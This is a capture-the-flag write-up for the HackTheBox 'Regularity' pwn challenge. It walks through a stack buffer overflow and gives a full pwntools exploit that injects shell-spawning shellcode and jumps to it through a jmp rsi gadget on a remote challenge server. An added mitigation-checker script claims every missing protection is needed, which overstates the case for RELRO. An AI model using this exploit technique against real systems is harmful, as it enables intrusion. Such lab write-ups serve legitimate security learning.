HackTheBox-Challenges Regularity Writeup

kazma, founder/president of the NCKU (成大) Cybersecurity Club

Brief Intro

Having just finished a few machines, I was curious what HackTheBox's Challenges are, so I came over to try them out. It feels like a CTF?

Exploitation

This one is fairly easy; no protections are enabled at all:

└─$ checksec regularity
[*] Checking for new versions of pwntools
To disable this functionality, set the contents of /home/kazmatw/.cache/.pwntools-cache-3.11/update to 'never' (old way).
Or add the following lines to ~/.pwn.conf or ~/.config/pwn.conf (or /etc/pwn.conf system-wide):
[update]
interval=never
[*] You have the latest version of Pwntools (4.12.0)
[*] '/home/kazmatw/regularity'
Arch: amd64-64-little
RELRO: No RELRO
Stack: No canary found
NX: NX unknown - GNU_STACK missing
PIE: No PIE (0x400000)
Stack: Executable
RWX: Has RWX segments

The program is simple, and it has a buffer overflow (bof):

.text:000000000040104B ; signed __int64 read()
.text:000000000040104B read proc near ; CODE XREF: _start+19↑p
.text:000000000040104B
.text:000000000040104B buf = byte ptr -100h
.text:000000000040104B
.text:000000000040104B sub rsp, 100h
.text:0000000000401052 mov eax, 0
.text:0000000000401057 mov edi, 0 ; fd
.text:000000000040105C lea rsi, [rsp+100h+buf] ; buf
.text:0000000000401060 mov edx, 110h ; count
.text:0000000000401065 syscall ; LINUX - sys_read
.text:0000000000401067 add rsp, 100h
.text:000000000040106E retn
.text:000000000040106E read endp

It reads 0x110 bytes into a 0x100-byte buffer, which is enough to overwrite the return address.
So we can write shellcode onto the stack and return to the start of the buffer, i.e. the location of the shellcode. As seen above, that address is conveniently still in rsi (lea rsi, [rsp+100h+buf]), and the program itself happens to contain this gadget:

.text:0000000000401000 ; void __noreturn start()
.text:0000000000401000 public _start
.text:0000000000401000 _start proc near ; DATA XREF: LOAD:0000000000400018↑o
.text:0000000000401000 ; LOAD:0000000000400088↑o
.text:0000000000401000 mov edi, 1
.text:0000000000401005 mov rsi, offset message1
.text:000000000040100F mov edx, 2Ah ; '*'
.text:0000000000401014 call write
.text:0000000000401019 call read
.text:000000000040101E mov edi, 1
.text:0000000000401023 mov rsi, offset message3
.text:000000000040102D mov edx, 27h ; '''
.text:0000000000401032 call write
.text:0000000000401037 mov rsi, offset exit
.text:0000000000401041 jmp rsi
.text:0000000000401041 _start endp

So we return to 0x401041, the jmp rsi.
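As an added example (not part of the original writeup), here is a small checker that parses the checksec output quoted above and reports which missing mitigations make this stack-shellcode approach possible. The checksec text is copied from this page; the function names are my own.

```python
import re

# Constructed copy of the checksec lines shown earlier in this writeup.
CHECKSEC_OUTPUT = """\
[*] '/home/kazmatw/regularity'
    Arch:     amd64-64-little
    RELRO:    No RELRO
    Stack:    No canary found
    NX:       NX unknown - GNU_STACK missing
    PIE:      No PIE (0x400000)
    Stack:    Executable
    RWX:      Has RWX segments
"""


def parse_checksec(text):
    """Return (key, value) pairs; 'Stack' appears twice, so keep a list, not a dict."""
    pairs = []
    for line in text.splitlines():
        m = re.match(r"\s*([A-Za-z]+):\s*(.+?)\s*$", line)
        if m:
            pairs.append((m.group(1), m.group(2)))
    return pairs


def weak_hardening(text):
    """Map each disabled mitigation to the exploit primitive it would have blocked."""
    findings = []
    for key, value in parse_checksec(text):
        v = value.lower()
        if key == "RELRO" and v.startswith("no relro"):
            findings.append("RELRO: GOT stays writable")
        elif key == "Stack" and "no canary" in v:
            findings.append("Canary: return-address overwrite is not detected")
        elif key == "Stack" and v == "executable":
            findings.append("Stack: shellcode placed in the buffer can execute")
        elif key == "NX" and ("disabled" in v or "unknown" in v):
            findings.append("NX: no W^X enforcement (GNU_STACK missing)")
        elif key == "PIE" and v.startswith("no pie"):
            findings.append("PIE: fixed load address, gadget addresses are static")
        elif key == "RWX" and "has rwx" in v:
            findings.append("RWX: a segment is both writable and executable")
    return findings


if __name__ == "__main__":
    for f in weak_hardening(CHECKSEC_OUTPUT):
        print(f)
```

Every one of the six findings is needed for the exploit below: the executable stack and missing NX let the shellcode run, the absent canary lets the overflow reach the return address, and the lack of PIE makes the jmp rsi address constant.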

Exploit

from pwn import *
context.arch = "amd64"
r = remote("94.237.53.113", 45254)

sc = asm(shellcraft.sh())          # shellcode lands at the start of buf (rsp)
jmp_rsi = 0x401041                 # gadget in _start; rsi still points at buf
# buf is 0x100 bytes: shellcode, padding up to 0x100, then the saved return address
p = flat(sc, b"a" * (0x100 - len(sc)), jmp_rsi)

r.send(p)
r.interactive()

Pwned !!!

pwn

  • Title: HackTheBox-Challenges Regularity Writeup
  • Author: kazma
  • Created at : 2024-08-11 11:37:47
  • Updated at : 2024-08-11 17:18:50
  • Link: https://kazma.tw/2024/08/11/HackTheBox-Challenges-Regularity-Writeup/
  • License: This work is licensed under CC BY-NC-SA 4.0.